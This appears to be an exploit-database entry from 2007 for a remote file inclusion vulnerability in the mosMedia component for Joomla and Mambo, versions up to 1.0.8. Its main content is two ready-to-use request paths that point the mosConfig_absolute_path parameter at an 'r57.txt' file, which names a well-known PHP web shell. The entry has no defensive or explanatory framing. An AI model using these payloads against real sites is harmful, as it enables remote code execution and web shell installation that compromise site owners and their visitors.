id: 1742
date: 04/10/2007
title: Joomla Component mosMedia <= 1.0.8 Remote File Inclusion Vulnerability
author: GoLd_M
cves: 

======================================================================
Joomla Component mosMedia <= 1.0.8 Remote File Inclusion Vulnerability
======================================================================



- com_mosmedia for Mambo & Jommla <= Remote File Include Vulnerability
- Exloit :
- /components/com_mosmedia/media.tab.php?mosConfig_absolute_path=r57.txt?
- /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=r57.txt?



#  0day.today [2023-03-26]  #